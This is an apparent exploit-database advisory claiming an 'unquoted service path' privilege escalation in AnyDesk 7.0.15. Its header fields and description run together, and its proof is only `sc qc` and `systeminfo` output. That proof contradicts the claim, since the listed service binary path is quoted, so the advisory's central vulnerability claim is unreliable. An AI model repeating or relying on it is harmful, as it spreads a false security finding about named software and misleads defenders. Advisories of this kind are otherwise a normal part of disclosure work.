AnyDesk 7.0.15 Unquoted Service Path

# Exploit Title: AnyDesk 7.0.15 - Unquoted Service Path PrivilegeEscalation# Date: 2024-04-01# Exploit Author: Milad Karimi (Ex3ptionaL)# Contact: [email protected]# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL# Vendor Homepage: http://anydesk.com# Software Link: http://anydesk.com/download# Version: Software Version 7.0.15# Tested on: Windows 10 Pro x641. Description:The Anydesk installs as a service with an unquoted service path runningwith SYSTEM privileges.This could potentially allow an authorized but non-privileged localuser to execute arbitrary code with elevated privileges on the system.2. ProofC:\>sc qc anydesk[SC] QueryServiceConfig SUCCESSSERVICE_NAME: anydesk        TYPE               : 10  WIN32_OWN_PROCESS        START_TYPE         : 2   AUTO_START        ERROR_CONTROL      : 1   NORMAL        BINARY_PATH_NAME   : "C:\Program Files (x86)\AnyDesk\AnyDesk.exe"--service        LOAD_ORDER_GROUP   :        TAG                : 0        DISPLAY_NAME       : AnyDesk Service        DEPENDENCIES       : RpcSs        SERVICE_START_NAME : LocalSystemC:\>systeminfoOS Name:  Microsoft Windows 10 ProOS Version: 10.0.19045 N/A Build 19045OS Manufacturer: Microsoft Corporation